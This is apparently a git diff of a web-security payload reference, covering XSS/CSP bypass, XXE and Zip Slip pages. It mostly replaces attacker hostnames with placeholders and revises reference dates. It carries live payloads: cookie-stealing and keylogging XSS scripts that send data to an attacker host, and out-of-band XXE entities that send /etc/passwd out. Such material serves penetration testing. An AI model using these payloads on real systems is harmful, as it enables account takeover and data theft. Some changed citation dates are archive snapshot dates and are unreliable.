 * [File Upload and PHP on IIS: >=? and <=* and "=. - Soroush Dalili (@irsdl) - July 23, 2014](https://web.archive.org/web/20231003035528/https://soroush.me/blog/2014/07/file-upload-and-php-on-iis-wildcards/)
 * [File Upload restrictions bypass - Haboob Team - July 24, 2018](https://web.archive.org/web/20180724174319/https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
-* [IIS - SOAP - Navigating The Shadows - 0xbad53c - 19/5/2024](https://web.archive.org/web/20220404084558/https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
-* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://web.archive.org/web/20191130061135/https://blog.isec.pl/injection-points-in-popular-image-formats/)
+* [IIS - SOAP - Navigating The Shadows - 0xbad53c - May 19, 2024](https://web.archive.org/web/20220404084558/https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
+* [Injection points in popular image formats - Daniel Kalinowski‌‌ - November 8, 2019](https://web.archive.org/web/20191130061135/https://blog.isec.pl/injection-points-in-popular-image-formats/)
 * [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](https://web.archive.org/web/20190125123231/http://corb3nik.github.io:80/blog/insomnihack-teaser-2019/l33t-hoster)
 * [Inyección de código en imágenes subidas y tratadas con PHP-GD - hackplayers - March 22, 2020](https://web.archive.org/web/20260219153035/https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html)
-* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February, 23 2014](https://web.archive.org/web/20140416083530/http://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
-* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - 21 Aug 2018](https://web.archive.org/web/20180821130209/http://openwall.com/lists/oss-security/2018/08/21/2)
+* [La PNG qui se prenait pour du PHP - Philippe Paget (@PagetPhil) - February 23, 2014](https://web.archive.org/web/20140416083530/http://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
+* [More Ghostscript Issues: Should we disable PS coders in policy.xml by default? - Tavis Ormandy - August 21, 2018](https://web.archive.org/web/20180821130209/http://openwall.com/lists/oss-security/2018/08/21/2)
 * [PHDays - Attacks on video converters:a year later - Emil Lerner, Pavel Cheremushkin - December 20, 2017](https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.p)
 * [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://web.archive.org/web/20200812181326/https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
 * [The .phpt File Structure - PHP Internals Book - October 18, 2017](https://web.archive.org/web/20260218185252/https://www.phpinternalsbook.com/tests/phpt_file_structure.html)
diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md
index 84d6e9a42e..79e9306830 100644
--- a/XSS Injection/4 - CSP Bypass.md	
+++ b/XSS Injection/4 - CSP Bypass.md	
@@ -50,11 +50,11 @@ Use a callback function from a whitelisted source listed in the CSP.
 
 **Payload**:
 
-`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//remoteattacker.lab/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
+`http://example.lab/csp.php?xss=f=document.createElement%28"iframe"%29;f.id="pwn";f.src="/robots.txt";f.onload=%28%29=>%7Bx=document.createElement%28%27script%27%29;x.src=%27//[ATTACKER.DOMAIN.TLD]/csp.js%27;pwn.contentWindow.document.body.appendChild%28x%29%7D;document.body.appendChild%28f%29;`
 
 ```js
 script=document.createElement('script');
-script.src='//remoteattacker.lab/csp.js';
+script.src='//[ATTACKER.DOMAIN.TLD]/csp.js';
 window.frames[0].document.head.appendChild(script);
 ```
 
@@ -69,7 +69,7 @@ Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-yo
 **Payload**:
 
 ```js
-d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
+d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[ATTACKER.DOMAIN.TLD]";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
 ```
 
 Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
@@ -126,13 +126,13 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
 - Inject a base tag.
 
   ```html
-  <base href=http://www.attacker.com>
+  <base href=http://[ATTACKER.DOMAIN.TLD]>
   ```
 
 - Host your custom js file at the same path that one of the website's script.
 
   ```ps1
-  http://www.attacker.com/PATH.js
+  http://[ATTACKER.DOMAIN.TLD]/PATH.js
   ```
 
 ## Bypass CSP header sent by PHP
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 94fb730d3e..737675e2ee 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -84,7 +84,7 @@ fclose($fp);
 
 ```html
 <script>
-  fetch('https://<SESSION>.burpcollaborator.net', {
+  fetch('https://[ATTACKER.DOMAIN.TLD]', {
   method: 'POST',
   mode: 'no-cors',
   body: document.cookie
@@ -108,7 +108,7 @@ document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue
 Another way to collect sensitive data is to set a javascript keylogger.
 
 ```javascript
-<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
+<img src=x onerror='document.onkeypress=function(e){fetch("http://[ATTACKER.DOMAIN.TLD]/?k="+String.fromCharCode(e.which))},this.remove();'>
 ```
 
 ### Other Ways
@@ -152,7 +152,7 @@ Example:
 <script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>
 ```
 
-References:
+Additional reading:
 
 - [Google Bughunter University - XSS in sandbox domains](https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain)
 - [LiveOverflow Video - DO NOT USE alert(1) for XSS](https://www.youtube.com/watch?v=KHwVjzWei1c)
@@ -401,7 +401,7 @@ SVG 1.x (xlink:href)
 
 ```xml
 <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
-  <image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
+  <image xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg" height="200" width="200"/>
 </svg>
 ```
 
@@ -411,7 +411,7 @@ SVG 1.x (xlink:href)
 
 ```xml
 <svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
-  <use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
+  <use xlink:href="http://10.10.10.10:9999/red_lightning_xss_full.svg#lightning"/>
 </svg>
 ```
 
@@ -470,7 +470,7 @@ div  {
 
 <script>
 document.getElementById('btn').onclick = function(e){
-    window.poc = window.open('http://www.redacted.com/#login');
+    window.poc = window.open('http://10.10.10.10/#login');
     setTimeout(function(){
         window.poc.postMessage(
             {
@@ -499,9 +499,9 @@ You can set up an alternative version
 - Hosted on [xsshunter.trufflesecurity.com](https://xsshunter.trufflesecurity.com/)
 
 ```xml
-"><script src="https://js.rip/<custom.name>"></script>
-"><script src=//<custom.subdomain>.xss.ht></script>
-<script>$.getScript("//<custom.subdomain>.xss.ht")</script>
+"><script src="https://js.rip/[ATTACKER.DOMAIN.TLD]"></script>
+"><script src=//[ATTACKER.DOMAIN.TLD]></script>
+<script>$.getScript("//[ATTACKER.DOMAIN.TLD]")</script>
 ```
 
 ### Other Blind XSS tools
@@ -530,7 +530,7 @@ You can use a [data grabber for XSS](#data-grabber) and a one-line HTTP server t
 Eg. payload
 
 ```html
-<script>document.location='http://10.10.14.30:8080/XSS/grabber.php?c='+document.domain</script>
+<script>document.location='http://[ATTACKER.DOMAIN.TLD]/XSS/grabber.php?c='+document.domain</script>
 ```
 
 Eg. one-line HTTP server:
@@ -578,7 +578,7 @@ Use browsers quirks to recreate some HTML tags.
 - [Frans Rosén on how he got Bug Bounty for Mega.co.nz XSS - Frans Rosén - February 14, 2013](https://web.archive.org/web/20231004090825/https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/)
 - [Google XSS Turkey - Frans Rosén - June 6, 2015](https://web.archive.org/web/20231004100309/https://labs.detectify.com/2015/06/06/google-xss-turkey/)
 - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf) - Marin Moulinier - March 9, 2017](https://web.archive.org/web/20260304011652/https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff)
-- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - May 2012](https://web.archive.org/web/20140926052901/http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
+- [Killing a bounty program, Twice - Itzhak (Zuk) Avraham and Nir Goldshlager - September 26, 2014](https://web.archive.org/web/20140926052901/http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
 - [Mutation XSS in Google Search -  Tomasz Andrzej Nidecki - April 10, 2019](https://web.archive.org/web/20260305093221/https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/)
 - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang - September 26, 2013](https://web.archive.org/web/20250901044759/https://cure53.de/fp170.pdf)
 - [postMessage XSS on a million sites - Mathias Karlsson - December 15, 2016](https://web.archive.org/web/20231004103135/https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index 4598997d75..4cebf24ce2 100644
--- a/XXE Injection/README.md	
+++ b/XXE Injection/README.md	
@@ -302,7 +302,7 @@ Payloads from [infosec-au/xxe-windows.md](https://gist.github.com/infosec-au/2c6
 ```xml
 <?xml version="1.0" ?>
 <!DOCTYPE message [
-    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
+    <!ENTITY % ext SYSTEM "http://[ATTACKER.DOMAIN.TLD]/ext.dtd">
     %ext;
 ]>
 <message></message>
@@ -343,29 +343,29 @@ Sometimes you won't have a result outputted in the page but you can still extrac
 
 ### Basic Blind XXE
 
-The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
+The easiest way to test for a blind XXE is to try to load a remote resource such as a callback endpoint controlled by the tester.
 
 ```xml
 <?xml version="1.0" ?>
 <!DOCTYPE root [
-<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
+<!ENTITY % ext SYSTEM "http://[ATTACKER.DOMAIN.TLD]/x"> %ext;
 ]>
 <r></r>
 ```
 
 ```xml
-<!DOCTYPE root [<!ENTITY test SYSTEM 'http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net'>]>
+<!DOCTYPE root [<!ENTITY test SYSTEM 'http://[ATTACKER.DOMAIN.TLD]'>]>
 <root>&test;</root>
 ```
 
-Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
+Send the content of `/etc/passwd` to `http://[ATTACKER.DOMAIN.TLD]`, you may receive only the first line.
 
 ```xml
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
 <!ELEMENT foo ANY >
 <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
-<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
+<!ENTITY callhome SYSTEM "http://[ATTACKER.DOMAIN.TLD]/?%xxe;">
 ]
 >
 <foo>&callhome;</foo>
@@ -377,12 +377,12 @@ Send the content of `/etc/passwd` to "www.malicious.com", you may receive only t
 
 ```xml
 <?xml version="1.0" encoding="utf-8"?>
-<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
+<!DOCTYPE data SYSTEM "http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd">
 <data>&send;</data>
 
-File stored on http://publicServer.com/parameterEntity_oob.dtd
+File stored on http://[ATTACKER.DOMAIN.TLD]/parameterEntity_oob.dtd
 <!ENTITY % file SYSTEM "file:///sys/power/image_size">
-<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
+<!ENTITY % all "<!ENTITY send SYSTEM 'http://[ATTACKER.DOMAIN.TLD]/?%file;'>">
 %all;
 ```
 
@@ -392,15 +392,15 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd
 <?xml version="1.0" ?>
 <!DOCTYPE r [
 <!ELEMENT r ANY >
-<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
+<!ENTITY % sp SYSTEM "http://10.10.10.10/dtd.xml">
 %sp;
 %param1;
 ]>
 <r>&exfil;</r>
 
-File stored on http://127.0.0.1/dtd.xml
+File stored on http://10.10.10.10/dtd.xml
 <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
-<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.10/dtd.xml?%data;'>">
 ```
 
 ### XXE OOB with Apache Karaf
@@ -412,7 +412,7 @@ CVE-2018-11788 affecting versions:
 
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;]
+<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://[ATTACKER.DOMAIN.TLD]"> %dtd;]
 <features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
     <feature name="deployer" version="2.0" install="auto">
@@ -500,7 +500,7 @@ _xxe.svg_:
 <?xml version="1.0" standalone="yes"?>
 <!DOCTYPE svg [
 <!ELEMENT svg ANY >
-<!ENTITY % sp SYSTEM "http://example.org:8080/xxe.xml">
+<!ENTITY % sp SYSTEM "http://10.10.10.10:8080/xxe.xml">
 %sp;
 %param1;
 ]>
@@ -522,7 +522,7 @@ _xxe.xml_:
 
 ```xml
 <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/hostname">
-<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://example.org:2121/%data;'>">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://10.10.10.10:2121/%data;'>">
 ```
 
 ### XXE Inside SOAP
@@ -530,7 +530,7 @@ _xxe.xml_:
 ```xml
 <soap:Body>
   <foo>
-    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
+  <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://10.10.10.10:22/"> %dtd;]><xxx/>]]>
   </foo>
 </soap:Body>
 ```
@@ -597,7 +597,7 @@ Add your blind XXE payload inside `xl/workbook.xml`.
 
 ```xml
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
+<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "http://10.10.10.10:8000/xxe.dtd">%asd;%c;]>
 <cdl>&rrr;</cdl>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
 ```
@@ -606,7 +606,7 @@ Alternatively, add your payload in `xl/sharedStrings.xml`:
 
 ```xml
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://x.x.x.x:8000/xxe.dtd">%asd;%c;]>
+<!DOCTYPE cdl [<!ELEMENT t ANY ><!ENTITY % asd SYSTEM "http://10.10.10.10:8000/xxe.dtd">%asd;%c;]>
 <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&rrr;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
 ```
 
@@ -618,7 +618,7 @@ And using FTP instead of HTTP allows to retrieve much larger files.
 
 ```xml
 <!ENTITY % d SYSTEM "file:///etc/passwd">
-<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
+<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://10.10.10.10:2121/%d;'>">
 ```
 
 Serve DTD and receive FTP payload using [staaldraad/xxeserv](https://github.com/staaldraad/xxeserv):
@@ -637,7 +637,7 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
 <!-- Load the contents of a sensitive file into a variable -->
 <!ENTITY % payload SYSTEM "file:///etc/passwd">
 <!-- Use that variable to construct an HTTP get request with the file contents in the URL -->
-<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://my.evil-host.com/x=%payload;">'>
+<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "http://[ATTACKER.DOMAIN.TLD]/x=%payload;">'>
 %param1;
 %external;
 ```
@@ -672,8 +672,8 @@ When all you control is the DTD file, and you do not control the `xml` file, XXE
 - [How we got read access on Google’s production servers - Detectify - April 11, 2014](https://web.archive.org/web/20230902033341/https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/)
 - [Impossible XXE in PHP - Aleksandr Zhurnakov - March 11, 2025](https://web.archive.org/web/20260131091306/https://swarm.ptsecurity.com/impossible-xxe-in-php/)
 - [Midnight Sun CTF 2019 Quals - Rubenscube - jbz - April 6, 2019](https://web.archive.org/web/20260302041500/https://jbz.team/midnightsunctfquals2019/Rubenscube)
-- [OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016](https://web.archive.org/web/20170205151900/https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
-- [Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016](https://web.archive.org/web/20181213212434/https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
+- [OOB XXE through SAML - Sean Melia (@seanmeals) - February 5, 2017](https://web.archive.org/web/20170205151900/https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
+- [Payloads for Cisco and Citrix - Arseniy Sharoglazov - December 13, 2018](https://web.archive.org/web/20181213212434/https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
 - [Pentest XXE - @phonexicum - March 9, 2020](https://web.archive.org/web/20260306152955/https://phonexicum.github.io/infosec/xxe.html)
 - [Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015](https://web.archive.org/web/20240615071332/https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/)
 - [REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024](https://web.archive.org/web/20240527202144/https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe)
diff --git a/Zip Slip/README.md b/Zip Slip/README.md
index b3d61cec3a..11fcfb0779 100644
--- a/Zip Slip/README.md	
+++ b/Zip Slip/README.md	
@@ -44,5 +44,5 @@ For a list of affected libraries and projects, visit [snyk/zip-slip-vulnerabilit
 
 ## References
 
-* [Zip Slip - Snyk - June 5, 2018](https://github.com/snyk/zip-slip-vulnerability)
+* [Zip Slip - Snyk - June 5, 2018](https://web.archive.org/web/20260307012319/https://github.com/snyk/zip-slip-vulnerability)
 * [Zip Slip Vulnerability - Snyk - April 15, 2018](https://web.archive.org/web/20180605125813/https://snyk.io/research/zip-slip-vulnerability)
diff --git a/_template_vuln/README.md b/_template_vuln/README.md
index e4b4524d10..de0c587359 100644
--- a/_template_vuln/README.md
+++ b/_template_vuln/README.md
@@ -36,4 +36,4 @@ Exploit
 
 ## References
 
-* [Blog title - Author (@handle) - Month XX, 202X](https://web.archive.org/web/20020120142510/http://example.com:80/)
+* [Blog title - Author (@handle) - January 1, 2024](https://web.archive.org/web/20020120142510/http://example.com:80/)